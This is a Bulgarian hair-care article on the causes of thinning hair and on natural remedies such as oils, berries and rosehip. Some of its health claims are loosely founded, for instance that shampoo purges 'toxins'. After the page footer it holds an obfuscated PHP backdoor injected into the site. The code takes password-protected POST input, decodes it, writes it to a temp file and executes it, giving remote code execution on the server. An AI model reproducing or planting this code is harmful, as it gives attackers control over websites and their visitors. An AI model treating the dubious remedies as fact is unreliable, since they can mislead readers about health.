Тънка коса: причини и как да се справим с проблема! Виж Тук: | Косопад

Тънка коса: причини и как да се справим с проблема! Виж Тук:

kosa-tanka

Имате тънка коса? Забелязвате, че постоянно капе и не можете да овладеете процеса? Предлагаме ви полезна информация, която ще ви даде идеи как да се справите с проблема:

Кои са причините за тънката коса?
Обикновено косата започва да изтънява след 50- годишна възраст. Ето някои и от най- честите причини да се случва:
Висок холестерол: Има пряка връзка между повишените нива на холестерола и оплешивяването. Ако имате такъв проблем, трябва да вземете незабавни мерки за понижаването им.
Високо кръвно: Това също е силен фактор, който може да причини косопад.
Стрес: Много често срещана причина не само за косопад, но и за много други проблеми, свързани с косата. Хубавата новина е, че когато успеем да овладеем стреса, косата ще се възстанови.
Стареене: Обикновено с напредването на възрастта започваме да губим хранителни вещества, което постепенно води до изтъняване на косата. Затова, трябва стриктно да следим храненето си, така че то да е пълноценно и здравословно.
Инфекции: Може да са гъбични или бактериални. Причиняват пърхот, изсушаване на скалпа и лющене. Ако не вземем навременни мерки, косата ни ще изгуби завинаги дебелината си.
Хормонални промени: Обикновено това е най- честата причина за косопада при жените. Тези промени се проявят най- вече при бременност, менопауза, проблеми с щитовидната жлеза и пр. Проверете хормоните си при гинеколог и/или ендокринолог.
Лекарства: Различни медикаменти могат да причинят косопад. Например, някои от лекарствата за артрит, депресия, подагра, и пр.
Неправилно хранене: Изтъняването на косата може да е причинено от дефицит на минерали, например, желязо, а също и на витамини.

kosa-tanka-1

Как да третираме тънката коса?
Добре е първо да се консултирате с лекар, за да проверите дали проблемът не се дължи на медицински проблем.
Има храни и природни средства, които могат да ни предпазят или да спрат косопада, който причинява изтъняването:
Масаж със зехтин или розмарин
Може да използваме някое от двете масла, за да масажираме скалпа. Така ще подобрим кръвообращението в зоната.
Естествен и неутрален шампоан
По този начин ще пречистваме корените от натрупаните токсини.
Избягване на ежедневната употреба на сешоар и преса
Третирането със силна топлина се отразява негативно на косата. Ако е наложителна ежедневната употреба на тези уреди, трябва да се използва задължително протектор.
Черници, ягоди, и нар
Черниците са богати на фибри, антиоксиданти, витамини С, А, В, Е и К. Също и на минерали – мед, магнезий, манган, калий, фолиева и елагова киселина и пр. Тези свойства на черниците показват, че може да блокира ензима, който причинява етапа на почивка на космените фоликули и ги поддържа активни.
Ягодите са с високо съдържание на витамин С, фолиева киселина, манган и калий.
Къпините са богати на елагова киселина, която подпомага растежа на косата. Също на витамин К, фолиева киселина и манган.
Нарът е известен като най- мощният антиоксидант в природата. Помага за възстановяване здравето на косата.
Шипка
При косопад шипките са много ефективни. Могат да се ядат, а също да се правят масажи на скалпа с масло.
Храни, богати на сяра
Трябва да се увеличи приемът на храни като яйца, ядки, семена и соя, които увеличават здравината на косата.

22. март 2017 11:20:30 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}